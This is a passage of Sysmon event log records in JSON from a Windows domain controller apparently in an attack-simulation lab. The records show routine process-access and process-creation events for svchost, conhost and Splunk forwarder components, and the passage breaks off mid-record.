{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6172,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6173,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6174,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6175,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6176,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6177,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:40.663\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2164-5F25-0000-0010D67F0900}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:40.663","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2164-5F25-0000-0010D67F0900}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6178,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nProcessGuid: {41C8662E-2165-5F25-0000-001081810900}\r\nProcessId: 4544\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","ProcessGuid":"{41C8662E-2165-5F25-0000-001081810900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6179,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2165-5F25-0000-001081810900}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2165-5F25-0000-001081810900}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6180,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2165-5F25-0000-001081810900}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 